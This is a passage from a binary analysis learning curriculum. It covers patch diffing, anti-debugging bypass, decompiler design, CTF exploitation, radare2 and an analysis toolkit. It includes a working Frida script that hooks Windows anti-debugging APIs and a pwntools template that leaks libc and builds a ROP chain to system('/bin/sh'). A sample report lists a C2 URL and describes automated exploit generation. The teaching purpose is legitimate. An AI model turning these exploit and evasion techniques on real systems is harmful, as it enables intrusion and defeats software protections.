#   png_check_chunk_length
#
# Deleted Functions:
#   (none)

# Analysis:
# The patch adds a bounds check in png_read_IDAT_data
# This fixes CVE-2023-XXXX (buffer overflow)
# Vulnerable code: memcpy without size check
# Fixed code: size validated before copy

Implementation Hints:

Binary diffing workflow:

  1. Get old and new versions of binary
  2. Export to BinDiff/Diaphora format
  3. Run the diffing tool
  4. Focus on:
    • Modified functions with low similarity
    • New validation/bounds check functions
    • Changes near memory operations
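
To get a feel for what a similarity score means, the sketch below compares two versions of a function by their mnemonic sequences using `difflib`. This is a deliberately naive stand-in: BinDiff, Diaphora, and ghidriff rely on richer features such as control-flow graph structure, and the instruction lists here are invented for the example.

```python
from difflib import SequenceMatcher


def similarity(old_mnemonics, new_mnemonics) -> float:
    """Ratio in [0, 1] of how much two mnemonic sequences have in common."""
    return SequenceMatcher(None, old_mnemonics, new_mnemonics).ratio()


# Hypothetical function before and after a patch that adds a bounds check
old_func = ['push', 'mov', 'call', 'ret']
new_func = ['push', 'mov', 'cmp', 'ja', 'call', 'ret']

score = similarity(old_func, new_func)
print(round(score, 2))  # 0.8

# Show what was inserted: a cmp/ja pair is the typical shape of a new bounds check
for tag, i1, i2, j1, j2 in SequenceMatcher(None, old_func, new_func).get_opcodes():
    if tag != 'equal':
        print(tag, old_func[i1:i2], '->', new_func[j1:j2])
```

A score below 1.0 flags the function for review, and the non-equal opcodes point at the inserted comparison.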

Tools:

  • BinDiff: Best for IDA Pro users
  • Diaphora: Open source, works with IDA
  • Ghidriff: Works with Ghidra, command-line
  • Ghidra Version Tracking: Built-in

Identifying security patches:

  • Look for new if statements (validation)
  • Look for changes to buffer operations
  • Look for new error handling
  • Check functions near strings like “overflow”, “bounds”

Learning milestones:

  1. Diff two versions → Generate comparison report
  2. Identify changed functions → Focus on modifications
  3. Find security patches → Understand what was fixed
  4. Recreate vulnerability → Test on old version

Project 14: Anti-Debugging Bypass

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Assembly, C, Python
  • Alternative Programming Languages: Frida scripts
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Anti-Analysis / Evasion
  • Software or Tool: x64dbg, GDB, Frida
  • Main Book: “The Art of Mac Malware” by Patrick Wardle

What you’ll build: Techniques to detect and bypass anti-debugging, anti-VM, and anti-analysis protections.

Why it teaches binary analysis: Real-world malware and protected software use these tricks. Knowing how to bypass them is essential.

Core challenges you’ll face:

  • Detecting debuggers → maps to IsDebuggerPresent, ptrace, etc.
  • Timing checks → maps to RDTSC, GetTickCount
  • VM detection → maps to CPUID, registry checks
  • Anti-disassembly → maps to opaque predicates, junk bytes

Resources for key challenges:

Key Concepts:

  • Windows Anti-Debugging: NtQueryInformationProcess, PEB flags
  • Linux Anti-Debugging: ptrace, /proc/self/status
  • Timing Attacks: RDTSC, clock differences

Difficulty: Advanced · Time estimate: 2-3 weeks · Prerequisites: Projects 4-7, debugger proficiency

Real world outcome:

# Frida script to bypass anti-debugging

import frida

jscode = """
// Bypass IsDebuggerPresent
Interceptor.replace(
    Module.getExportByName('kernel32.dll', 'IsDebuggerPresent'),
    new NativeCallback(function() {
        console.log('[*] IsDebuggerPresent called - returning false');
        return 0;
    }, 'int', [])
);

// Bypass NtQueryInformationProcess (ProcessDebugPort)
Interceptor.attach(
    Module.getExportByName('ntdll.dll', 'NtQueryInformationProcess'),
    {
        onEnter: function(args) {
            this.processInfoClass = args[1].toInt32();
            this.buffer = args[2];
        },
        onLeave: function(retval) {
            if (this.processInfoClass === 7) {  // ProcessDebugPort
                console.log('[*] ProcessDebugPort check bypassed');
                this.buffer.writeU64(0);
            }
        }
    }
);

// Bypass timing checks by hooking GetTickCount
var originalGetTickCount = Module.getExportByName('kernel32.dll', 'GetTickCount');
var lastTick = 0;
Interceptor.replace(originalGetTickCount,
    new NativeCallback(function() {
        lastTick += 100;  // Always return consistent timing
        return lastTick;
    }, 'uint', [])
);

console.log('[*] Anti-debugging bypasses installed');
"""

device = frida.get_local_device()
pid = device.spawn(['./protected.exe'])
session = device.attach(pid)
script = session.create_script(jscode)
script.load()
device.resume(pid)
input('[*] Press Enter to detach...\n')  # Keep hooks alive while the target runs
session.detach()

Implementation Hints:

Common anti-debugging techniques:

Windows:

// Technique 1: IsDebuggerPresent
if (IsDebuggerPresent()) exit(1);

// Technique 2: PEB.BeingDebugged flag
PPEB peb = (PPEB)__readgsqword(0x60);
if (peb->BeingDebugged) exit(1);

// Technique 3: NtQueryInformationProcess
DWORD_PTR debugPort = 0;  // Pointer-sized: 8 bytes on x64
NtQueryInformationProcess(GetCurrentProcess(),
    ProcessDebugPort, &debugPort, sizeof(debugPort), NULL);
if (debugPort != 0) exit(1);

// Technique 4: Timing check
DWORD start = GetTickCount();
// ... code ...
DWORD end = GetTickCount();
if (end - start > 100) exit(1);  // Too slow = debugger

Linux:

// Technique 1: ptrace self-attach
if (ptrace(PTRACE_TRACEME, 0, 0, 0) == -1) exit(1);

// Technique 2: Check /proc/self/status
FILE *f = fopen("/proc/self/status", "r");
// Look for TracerPid: non-zero = debugged
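
The `/proc/self/status` check is simple enough to prototype in a few lines, which also makes it easy to see what a bypass has to fake. This is a sketch for Linux only; the function names are illustrative and the sample text is a trimmed, made-up status file.

```python
def tracer_pid(status_text: str) -> int:
    """Extract the TracerPid field from the contents of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith('TracerPid:'):
            return int(line.split(':', 1)[1].strip())
    return 0  # Field missing: treat as not traced


def being_traced(path: str = '/proc/self/status') -> bool:
    """True if another process (debugger, strace) is attached via ptrace."""
    with open(path) as f:
        return tracer_pid(f.read()) != 0


# Trimmed example of what the file looks like under a debugger (PID values invented)
sample_status = 'Name:\tcrackme\nState:\tt (tracing stop)\nPid:\t4242\nTracerPid:\t4100\n'
print(tracer_pid(sample_status))  # 4100
```

A bypass therefore needs the target to read `TracerPid:\t0`, for example by hooking `fopen`/`read` or by patching the comparison that follows.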

Bypass approaches:

  1. Patch the check: NOP out the comparison
  2. Hook the API: Return false from IsDebuggerPresent
  3. Modify environment: Clear PEB flag
  4. Use stealth debugger: ScyllaHide, TitanHide

Learning milestones:

  1. Identify techniques → Recognize anti-debugging code
  2. Static bypass → Patch checks in binary
  3. Dynamic bypass → Use hooks/plugins
  4. Write bypasses → Create reusable scripts

Project 15: Build a Decompiler

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: C++, Rust
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 4. The “Open Core” Infrastructure
  • Difficulty: Level 5: Master
  • Knowledge Area: Program Analysis / Code Generation
  • Software or Tool: Your disassembler, LLVM (optional)
  • Main Book: “Compilers: Principles, Techniques, and Tools” (Dragon Book)

What you’ll build: A decompiler that converts assembly/IR back into readable C-like pseudocode.

Why it teaches binary analysis: Decompilation is the ultimate reverse engineering skill. Building one means understanding control flow, data flow, and type recovery.

Core challenges you’ll face:

  • Control flow recovery → maps to if/else, loops from jumps
  • Data flow analysis → maps to variable identification
  • Type inference → maps to int vs pointer vs struct
  • Code generation → maps to producing readable output

Resources for key challenges:

Key Concepts:

  • Control Flow Graphs: “Engineering a Compiler” Ch. 8
  • SSA Form: “Engineering a Compiler” Ch. 9
  • Type Recovery: Academic papers on type inference

Difficulty: Master · Time estimate: 2-3 months · Prerequisites: All previous projects, compiler theory

Real world outcome:

Input (disassembly):
    push    rbp
    mov     rbp, rsp
    sub     rsp, 0x20
    mov     [rbp-0x14], edi
    mov     [rbp-0x20], rsi
    cmp     dword [rbp-0x14], 1
    jle     .fail
    mov     rax, [rbp-0x20]
    mov     rdi, [rax+8]
    call    atoi
    cmp     eax, 0x539
    jne     .fail
    lea     rdi, [success_msg]
    call    puts
    jmp     .end
.fail:
    lea     rdi, [fail_msg]
    call    puts
.end:
    xor     eax, eax
    leave
    ret

Output (decompiled):
    int main(int argc, char **argv) {
        int input;

        if (argc <= 1) {
            puts("Wrong!");
            return 0;
        }

        input = atoi(argv[1]);

        if (input != 1337) {
            puts("Wrong!");
            return 0;
        }

        puts("Correct!");
        return 0;
    }

Implementation Hints:

Decompilation phases:

  1. Disassembly: Convert bytes to instructions
  2. Control Flow Graph: Build graph of basic blocks
  3. Data Flow Analysis: Track value flow through registers
  4. Type Analysis: Infer types from usage
  5. Control Flow Structuring: Convert jumps to if/while
  6. Code Generation: Output C-like code
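
Phase 2 starts with splitting the instruction stream into basic blocks. A common approach is to mark "leaders": the first instruction, every jump target, and every instruction that follows a jump. The sketch below applies that rule to a simplified version of the listing above; the tuple format (mnemonic plus target index) is an assumption made for this example.

```python
def find_leaders(instrs):
    """Return sorted indices of instructions that start a basic block."""
    leaders = {0}
    for i, (mnemonic, target) in enumerate(instrs):
        if mnemonic.startswith('j'):          # jmp and conditional jumps
            if target is not None:
                leaders.add(target)           # the jump target starts a block
            if i + 1 < len(instrs):
                leaders.add(i + 1)            # so does the fall-through instruction
        elif mnemonic == 'ret' and i + 1 < len(instrs):
            leaders.add(i + 1)
    return sorted(leaders)


# (mnemonic, index of jump target or None), loosely following the example above
instrs = [
    ('cmp', None),   # 0
    ('jle', 7),      # 1  -> .fail
    ('call', None),  # 2  atoi
    ('cmp', None),   # 3
    ('jne', 7),      # 4  -> .fail
    ('call', None),  # 5  puts(success)
    ('jmp', 9),      # 6  -> .end
    ('lea', None),   # 7  .fail
    ('call', None),  # 8  puts(fail)
    ('xor', None),   # 9  .end
    ('ret', None),   # 10
]
print(find_leaders(instrs))  # [0, 2, 5, 7, 9]
```

Each block then runs from one leader up to the instruction before the next, and the jump targets and fall-throughs become the CFG edges.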

Control flow structuring algorithms:

  • If-then-else: Look for diamond patterns
  • While loops: Back edges in CFG
  • For loops: Canonical form with counter
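
Loop detection hinges on finding back edges. The sketch below uses a depth-first search and reports edges that point to a node still on the DFS stack. For reducible control flow (what structured C compiles to) these coincide with back edges in the dominator sense; irreducible graphs need a proper dominator analysis, which this example does not attempt. The CFG is a hypothetical `while` loop.

```python
def back_edges(cfg: dict, entry: str):
    """Return edges (src, dst) where dst is an ancestor of src in the DFS tree."""
    found = []
    state = {}  # node -> 'active' while on the DFS stack, 'done' afterwards

    def dfs(node):
        state[node] = 'active'
        for succ in cfg.get(node, []):
            if state.get(succ) == 'active':
                found.append((node, succ))    # edge back to a node still being explored
            elif succ not in state:
                dfs(succ)
        state[node] = 'done'

    dfs(entry)
    return found


# Hypothetical CFG of: while (cond) { body }  followed by exit
cfg = {
    'entry': ['cond'],
    'cond': ['body', 'exit'],
    'body': ['cond'],
    'exit': [],
}
print(back_edges(cfg, 'entry'))  # [('body', 'cond')]
```

The target of a back edge (`cond` here) is the loop header, and the nodes that can reach the source without passing through the header form the loop body.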

Questions to consider:

  • How do you detect loop vs if-else?
  • How do you recover variable names?
  • How do you handle optimized code?
  • How do you represent structs?

Start simple:

  1. Handle single-block functions
  2. Add if-else handling
  3. Add while loop detection
  4. Add function call recovery
  5. Add type inference

Learning milestones:

  1. Build CFG from assembly → Basic blocks and edges
  2. Detect if-else → Diamond pattern recognition
  3. Detect loops → Back edge identification
  4. Generate readable code → Produce C-like output

Project 16: CTF Binary Exploitation Practice

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python (pwntools)
  • Alternative Programming Languages: Shell scripting
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 3: Advanced
  • Knowledge Area: CTF / Competitive Hacking
  • Software or Tool: pwntools, Docker, CTF platforms
  • Main Book: “CTF Field Guide” (Trail of Bits)

What you’ll build: Solutions to 20+ CTF pwn challenges across difficulty levels, plus a personal exploit template library.

Why it teaches binary analysis: CTF challenges are designed to teach specific concepts. They provide immediate feedback and gamified learning.

Core challenges you’ll face:

  • Various vulnerability types → maps to stack, heap, format string
  • Different protections → maps to ASLR, NX, canary, PIE
  • Time pressure → maps to efficient analysis workflow
  • Novel techniques → maps to learning new tricks

Resources for key challenges:

Key Concepts:

  • Challenge Categories: CTF101.org
  • Exploit Primitives: “The Shellcoder’s Handbook”
  • Advanced Techniques: CTF writeups

Difficulty: Advanced · Time estimate: Ongoing (2+ months) · Prerequisites: Projects 7-8 (Buffer Overflow, ROP)

Real world outcome:

# Exploit template
from pwn import *

# Configuration
binary = './challenge'
libc_path = './libc.so.6' if args.REMOTE else '/lib/x86_64-linux-gnu/libc.so.6'
host, port = 'challenge.ctf.com', 1337

# Setup
elf = context.binary = ELF(binary)
libc = ELF(libc_path)

def conn():
    if args.REMOTE:
        return remote(host, port)
    elif args.GDB:
        return gdb.debug(binary, '''
            break main
            continue
        ''')
    else:
        return process(binary)

# Gadgets
rop = ROP(elf)
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
ret = rop.find_gadget(['ret'])[0]

# Exploit
def exploit():
    p = conn()

    # Stage 1: Leak libc
    payload = flat({
        0x48: pop_rdi,
        0x50: elf.got['puts'],
        0x58: elf.plt['puts'],
        0x60: elf.symbols['main']
    })

    p.sendlineafter(b'> ', payload)
    leak = u64(p.recvline().strip().ljust(8, b'\x00'))
    libc.address = leak - libc.symbols['puts']
    log.success(f'libc base: {hex(libc.address)}')

    # Stage 2: Shell
    payload = flat({
        0x48: ret,
        0x50: pop_rdi,
        0x58: next(libc.search(b'/bin/sh')),
        0x60: libc.symbols['system']
    })

    p.sendlineafter(b'> ', payload)
    p.interactive()

if __name__ == '__main__':
    exploit()

Implementation Hints:

Progression path:

  1. Stack challenges: Buffer overflow, ret2win
  2. ROP challenges: ret2libc, ROP chains
  3. Format string: Read/write primitives
  4. Heap challenges: Use-after-free, heap overflow
  5. Advanced: House of Force, tcache poisoning

Build your template library:

  • leak_libc.py - Standard libc leak pattern
  • rop_chain.py - ROP chain builder
  • format_string.py - Format string exploit
  • heap_exploit.py - Heap exploitation patterns

Practice platforms:

  • pwnable.kr (beginner-friendly)
  • ROP Emporium (ROP-focused)
  • pwnable.tw (advanced)
  • picoCTF (beginner)

Learning milestones:

  1. Solve 10 stack challenges → Master buffer overflows
  2. Solve 5 ROP challenges → Bypass NX
  3. Solve 5 format string → Arbitrary read/write
  4. Attempt heap challenges → Enter advanced territory

Project 17: radare2 Mastery

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: r2 commands, r2pipe (Python)
  • Alternative Programming Languages: JavaScript (r2js)
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Static Analysis / Command Line RE
  • Software or Tool: radare2, Cutter (GUI)
  • Main Book: “The radare2 Book”

What you’ll build: Complete analysis of binaries using only radare2’s command-line interface, plus automation with r2pipe.

Why it teaches binary analysis: radare2 is one of the most capable open-source RE frameworks. Its CLI forces you to think about what you’re doing.

Core challenges you’ll face:

  • Command syntax → maps to steep learning curve
  • Navigation → maps to moving through binaries
  • Visual mode → maps to interactive disassembly
  • Scripting → maps to r2pipe automation

Resources for key challenges:

Key Concepts:

  • Command Structure: radare2 book
  • Visual Mode: V and VV commands
  • r2pipe: Python bindings documentation

Difficulty: Intermediate · Time estimate: 2-3 weeks · Prerequisites: Projects 1-4

Real world outcome:

$ r2 ./crackme
[0x00401040]> aaa               # Analyze all
[0x00401040]> afl               # List functions
0x00401040    1 43           entry0
0x00401170    4 101          main
0x004011e0    3 67           sym.check_password

[0x00401040]> s main            # Seek to main
[0x00401170]> pdf               # Print disassembly function
            ; CODE XREF from entry0
┌ 101: int main (int argc, char **argv);
│           0x00401170      push rbp
│           0x00401171      mov rbp, rsp
│           0x00401174      sub rsp, 0x40
│           ...
│           0x004011a0      call sym.check_password
│       ┌─< 0x004011a5      test eax, eax
│       │   0x004011a7      je 0x4011b8
│       │   0x004011a9      lea rdi, str.Correct
│       │   0x004011b0      call sym.imp.puts

[0x00401170]> VV                # Visual graph mode
[0x00401170]> s sym.check_password
[0x004011e0]> pdg               # Decompile (requires the r2ghidra plugin)

int check_password(char *input) {
    return strcmp(input, "s3cr3t") == 0;
}

# r2pipe automation
$ python3
>>> import r2pipe
>>> r2 = r2pipe.open('./crackme')
>>> r2.cmd('aaa')
>>> functions = r2.cmdj('aflj')  # JSON output
>>> for f in functions:
...     print(f['name'], hex(f['offset']))
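
Once `cmdj` has returned plain Python data, the rest of the automation is ordinary list processing. The sketch below ranks functions by size, a quick way to spot where the real logic lives. It runs on a hard-coded list shaped like the `afl` output above rather than calling r2pipe, and it assumes each entry has `name`, `offset`, and `size` keys; key names can differ between radare2 versions, so check your own `aflj` output.

```python
def largest_functions(functions, n=2):
    """Return (name, hex address) for the n largest functions."""
    ranked = sorted(functions, key=lambda f: f['size'], reverse=True)
    return [(f['name'], hex(f['offset'])) for f in ranked[:n]]


# Stand-in for r2.cmdj('aflj'), using the values from the session above
functions = [
    {'name': 'entry0', 'offset': 0x401040, 'size': 43},
    {'name': 'main', 'offset': 0x401170, 'size': 101},
    {'name': 'sym.check_password', 'offset': 0x4011e0, 'size': 67},
]

for name, addr in largest_functions(functions):
    print(addr, name)
```

The same pattern works for any JSON-producing command (those ending in `j`), such as `izj` for strings or `iij` for imports.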

Implementation Hints:

Essential r2 commands:

# Analysis
aaa              # Analyze all
afl              # List functions
axt addr         # Xrefs to address
axf addr         # Xrefs from address
iz               # List strings
ii               # List imports

# Navigation
s addr           # Seek to address
s main           # Seek to function
sf               # Seek to next function
sb               # Seek to start of current basic block
s-               # Undo last seek (go back)

# Disassembly
pd 20            # Print 20 instructions
pdf              # Print function disassembly
pdc              # Built-in pseudo-decompile (pdg for r2ghidra decompilation)
pdr              # Disassemble function recursively, following its graph

# Visual mode
V                # Visual mode (press p to cycle views)
VV               # Visual graph mode
v                # Visual panels mode (V! in older versions)

# Debugging
db addr          # Set breakpoint
dc               # Continue
ds               # Step
dr               # Show registers
ood              # Reopen in debug mode (doo in older versions)

# Patching (open with r2 -w, or run oo+ to reopen in write mode)
wa nop           # Write assembly (nop)
wx 90            # Write hex bytes

Common workflows:

  1. aaa; afl - Analyze and list functions
  2. iz; iz~password - Find interesting strings
  3. axt str.password - Find references to string
  4. s ref; pdf - Go to reference, disassemble
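
The workflow above (find strings, then find what references them) can be scripted with r2pipe. This is a minimal sketch rather than a definitive implementation: `find_string_xrefs` and `main` are hypothetical helper names, and it assumes a recent radare2 where `izj` returns plain-text `string` fields and each `axtj` entry carries a `from` address.

```python
import json


def find_string_xrefs(r2, keyword):
    """Map each string containing `keyword` to the addresses that reference it.

    `r2` is any object with a cmd(str) -> str method, such as the handle
    returned by r2pipe.open().
    """
    results = {}
    strings = json.loads(r2.cmd("izj") or "[]")  # workflow step 2: list strings
    for entry in strings:
        text = entry.get("string", "")
        if keyword.lower() not in text.lower():
            continue
        # workflow step 3: cross-references to the string's virtual address
        xrefs = json.loads(r2.cmd(f"axtj @ {entry['vaddr']:#x}") or "[]")
        results[text] = [x["from"] for x in xrefs]
    return results


def main(path, keyword):
    # Third-party dependency (assumed installed): pip install r2pipe,
    # with the radare2 binary available on PATH.
    import r2pipe

    r2 = r2pipe.open(path)
    r2.cmd("aaa")  # workflow step 1: analyze
    for text, refs in find_string_xrefs(r2, keyword).items():
        print(repr(text), [hex(addr) for addr in refs])
    r2.quit()
```

Calling `main("./crackme", "password")` prints each matching string with its referencing addresses; from there, `s <addr>; pdf` in an interactive session covers step 4. Keeping the r2pipe import inside `main` lets the parsing logic be exercised with a stub object.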

Learning milestones:

  1. Basic navigation → Move around binaries
  2. Visual mode → Efficient analysis
  3. Find vulnerabilities → Locate interesting code
  4. Automate with r2pipe → Script your analysis

Project 18: Complete Binary Analysis Toolkit

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: Rust, C
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 4. The “Open Core” Infrastructure
  • Difficulty: Level 5: Master
  • Knowledge Area: Tool Development / Complete Framework
  • Software or Tool: Your previous projects
  • Main Book: All previous books

What you’ll build: A unified toolkit combining your ELF/PE parser, disassembler, analyzer, and exploit helpers into one professional tool.

Why it teaches binary analysis: Building professional tools requires integrating all your knowledge into a cohesive system.

Core challenges you’ll face:

  • Clean architecture → maps to modular, extensible design
  • User experience → maps to helpful output, good CLI
  • Integration → maps to combining all components
  • Documentation → maps to making it usable

  • Time estimate: 2-3 months
  • Prerequisites: All previous projects

Real world outcome:

$ binkit analyze ./suspicious
╔══════════════════════════════════════════════════════════════╗
║                    Binary Analysis Report                     ║
╠══════════════════════════════════════════════════════════════╣
║ File:     suspicious                                          ║
║ Format:   ELF64                                               ║
║ Arch:     x86-64                                              ║
║ Compiler: GCC 11.2.0                                          ║
╠══════════════════════════════════════════════════════════════╣
║                       Security                                ║
╠══════════════════════════════════════════════════════════════╣
║ RELRO:        Full RELRO     ✓                               ║
║ Stack Canary: Not found      ✗                               ║
║ NX:           Enabled        ✓                               ║
║ PIE:          Disabled       ✗                               ║
║ Fortify:      Disabled       ✗                               ║
╠══════════════════════════════════════════════════════════════╣
║                    Vulnerabilities                            ║
╠══════════════════════════════════════════════════════════════╣
║ ⚠ gets() called at 0x401234 - Buffer overflow risk           ║
║ ⚠ strcpy() called at 0x401456 - No bounds checking           ║
║ ⚠ Format string at 0x401567 - printf(user_input)             ║
╠══════════════════════════════════════════════════════════════╣
║                    Interesting Strings                        ║
╠══════════════════════════════════════════════════════════════╣
║ 0x402000: "/bin/sh"                                           ║
║ 0x402008: "http://c2.evil.com"                                ║
║ 0x402020: "password123"                                       ║
╠══════════════════════════════════════════════════════════════╣
║                      Exploit Template                         ║
╠══════════════════════════════════════════════════════════════╣
║ Generated: exploit_suspicious.py                              ║
║ Target: gets() overflow at 0x401234                          ║
║ Strategy: ROP chain to system("/bin/sh")                     ║
╚══════════════════════════════════════════════════════════════╝

$ binkit disasm 0x401234 20
0x00401234: 48 89 e7              mov rdi, rsp
0x00401237: e8 c4 fe ff ff        call 0x401100 <gets@plt>
0x0040123c: 48 85 c0              test rax, rax
...

$ binkit exploit ./suspicious --output pwn.py
[*] Generating exploit template...
[*] Found gets() vulnerability at 0x401234
[*] ROP gadgets found: 15
[*] Exploit written to pwn.py
[*] Run with: python3 pwn.py
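
The `call` line in the `binkit disasm` output can be checked by hand, which is a useful sanity test when you wire your own disassembler into the toolkit. The sketch below assumes the standard x86-64 encoding of a near relative call (opcode `E8` followed by a signed 32-bit little-endian displacement, relative to the next instruction); `call_target` is a hypothetical helper name.

```python
import struct


def call_target(insn_addr, insn_bytes):
    """Resolve the destination of an x86-64 `call rel32` (opcode 0xE8)."""
    if len(insn_bytes) != 5 or insn_bytes[0] != 0xE8:
        raise ValueError("expected a 5-byte E8 call instruction")
    (rel32,) = struct.unpack("<i", insn_bytes[1:])  # signed, little-endian
    next_insn = insn_addr + len(insn_bytes)         # displacement is relative to this
    return (next_insn + rel32) & 0xFFFFFFFFFFFFFFFF


# Bytes and address taken from the sample disassembly: e8 c4 fe ff ff at 0x401237
target = call_target(0x401237, bytes.fromhex("e8c4feffff"))
print(hex(target))  # 0x401100
```

The displacement `c4 fe ff ff` decodes to -0x13c, and 0x40123c - 0x13c = 0x401100, matching the `gets@plt` address in the listing.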

Implementation Hints:

Architecture:

binkit/
├── core/
│   ├── parser.py      # ELF/PE parsing (Projects 1-2)
│   ├── disasm.py      # Disassembly (Project 3)
│   └── analyzer.py    # Vulnerability detection
├── exploit/
│   ├── rop.py         # ROP chain builder
│   ├── shellcode.py   # Shellcode generation
│   └── templates/     # Exploit templates
├── output/
│   ├── console.py     # Pretty printing
│   └── report.py      # Report generation
└── cli.py             # Command-line interface
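
One possible shape for `cli.py` is a thin `argparse` front end with one subcommand per sample invocation shown earlier (`analyze`, `disasm`, `exploit`). This is only a sketch: the argument names are assumptions inferred from the sample commands, and the actual handlers are left out.

```python
import argparse


def build_parser():
    """Build the top-level `binkit` parser with one subparser per command."""
    parser = argparse.ArgumentParser(prog="binkit")
    sub = parser.add_subparsers(dest="command", required=True)

    analyze = sub.add_parser("analyze", help="print a full analysis report")
    analyze.add_argument("binary")

    disasm = sub.add_parser("disasm", help="disassemble instructions at an address")
    # int(s, 0) accepts both "0x401234" and plain decimal
    disasm.add_argument("address", type=lambda s: int(s, 0))
    disasm.add_argument("count", type=int, nargs="?", default=20)

    exploit = sub.add_parser("exploit", help="write an exploit template")
    exploit.add_argument("binary")
    exploit.add_argument("--output", default="pwn.py")
    return parser


def parse_cli(argv=None):
    """Parse arguments; dispatching to core/ and exploit/ modules is left to you."""
    return build_parser().parse_args(argv)
```

For example, `parse_cli(["disasm", "0x401234", "20"])` yields a namespace with `command="disasm"`, `address=0x401234`, and `count=20`. Keeping parsing separate from dispatch means each module under `core/` and `exploit/` can be tested without going through the command line.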

Features to implement:

  1. Auto-detect file format
  2. Security check (like checksec)
  3. Vulnerability scanning
  4. ROP gadget finder
  5. Exploit template generator
  6. Report generation
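
Features 1 and 2 can start from a few fixed header offsets. The sketch below is a simplified illustration, not a replacement for your Project 1-2 parsers: `detect_format` and `elf64_security` are hypothetical names, the security check handles only little-endian ELF64, and it covers only PIE and NX. Treating `ET_DYN` as PIE is a heuristic, since shared objects use the same type.

```python
import struct

ET_DYN = 3                 # e_type shared by PIE executables and shared objects
PT_GNU_STACK = 0x6474E551  # program header that carries stack permissions
PF_X = 0x1                 # execute bit in p_flags
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",  # 32-bit, both byte orders
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",  # 64-bit, both byte orders
}


def detect_format(data):
    """Guess the container format from the leading magic bytes."""
    head = bytes(data[:4])
    if head == b"\x7fELF":
        ei_class = data[4] if len(data) > 4 else 0
        return {1: "ELF32", 2: "ELF64"}.get(ei_class, "ELF")
    if head[:2] == b"MZ" and len(data) >= 0x40:
        (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)  # offset of PE header
        if bytes(data[e_lfanew:e_lfanew + 4]) == b"PE\x00\x00":
            return "PE"
        return "MZ"  # DOS stub without a PE signature
    if head in MACHO_MAGICS:
        return "Mach-O"
    return "unknown"


def elf64_security(data):
    """Heuristic PIE and NX checks for a little-endian ELF64 image."""
    (e_type,) = struct.unpack_from("<H", data, 16)
    (e_phoff,) = struct.unpack_from("<Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    nx = False  # no PT_GNU_STACK header found: NX is not confirmed
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
    return {"pie": e_type == ET_DYN, "nx": nx}
```

A typical call is `detect_format(open(path, "rb").read())`, followed by `elf64_security` when the result is `"ELF64"`. RELRO, canary, and Fortify checks need the dynamic section and symbol tables, so they belong with your full ELF parser.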

Learning milestones:

  1. Integrate parsers → Support ELF and PE
  2. Add analysis → Vulnerability detection
  3. Build CLI → User-friendly interface
  4. Generate exploits → Automated template creation
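
For the vulnerability-detection milestone, a first pass can simply flag calls to functions that are commonly misused. The sketch below assumes your disassembler already yields `(address, callee_name)` pairs; `RISKY_CALLS` and `scan_calls` are hypothetical names, and the list of functions is illustrative rather than complete. A flagged call is a lead to investigate, not proof of a bug.

```python
# Functions whose use often indicates a memory-safety problem (illustrative subset).
RISKY_CALLS = {
    "gets": "Buffer overflow risk",
    "strcpy": "No bounds checking",
    "strcat": "No bounds checking",
    "sprintf": "No bounds checking",
}


def normalize(name):
    """Strip common decorations such as 'sym.imp.' prefixes and '@plt' suffixes."""
    name = name.split("@", 1)[0]
    for prefix in ("sym.imp.", "sym."):
        if name.startswith(prefix):
            name = name[len(prefix):]
            break
    return name


def scan_calls(call_sites):
    """Return report lines for every call site that targets a risky function."""
    findings = []
    for addr, callee in call_sites:
        base = normalize(callee)
        if base in RISKY_CALLS:
            findings.append(f"⚠ {base}() called at {addr:#x} - {RISKY_CALLS[base]}")
    return findings
```

For example, `scan_calls([(0x401234, "gets@plt")])` returns one line in the same style as the sample report. Detecting format-string bugs such as `printf(user_input)` needs data-flow information about the first argument, so it does not fit this name-based approach.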

Project Comparison Table

| #  | Project           | Difficulty | Time       | Key Skill               | Fun        |
|----|-------------------|------------|------------|-------------------------|------------|
| 1  | ELF Parser        | ⭐⭐       | 1-2 weeks  | File Formats            | ⭐⭐⭐     |
| 2  | PE Parser         | ⭐⭐       | 1-2 weeks  | Windows Formats         | ⭐⭐⭐     |
| 3  | Disassembler      | ⭐⭐⭐     | 2-4 weeks  | Instruction Encoding    | ⭐⭐⭐⭐   |
| 4  | GDB Deep Dive     | ⭐⭐       | 1-2 weeks  | Debugging               | ⭐⭐⭐⭐   |
| 5  | Ghidra RE         | ⭐⭐       | 2-3 weeks  | Static Analysis         | ⭐⭐⭐⭐   |
| 6  | Crackmes          | ⭐⭐       | 2-4 weeks  | Reverse Engineering     | ⭐⭐⭐⭐⭐ |
| 7  | Buffer Overflow   | ⭐⭐⭐     | 3-4 weeks  | Exploitation            | ⭐⭐⭐⭐⭐ |
| 8  | ROP Chains        | ⭐⭐⭐⭐   | 2-3 weeks  | Advanced Exploitation   | ⭐⭐⭐⭐⭐ |
| 9  | strace/ltrace     |            | 3-5 days   | Dynamic Analysis        | ⭐⭐⭐     |
| 10 | Malware Lab       | ⭐⭐⭐     | 4-6 weeks  | Malware Analysis        | ⭐⭐⭐⭐⭐ |
| 11 | angr              | ⭐⭐⭐⭐   | 2-3 weeks  | Symbolic Execution      | ⭐⭐⭐⭐   |
| 12 | Fuzzing           | ⭐⭐⭐     | 2-3 weeks  | Vulnerability Discovery | ⭐⭐⭐⭐   |
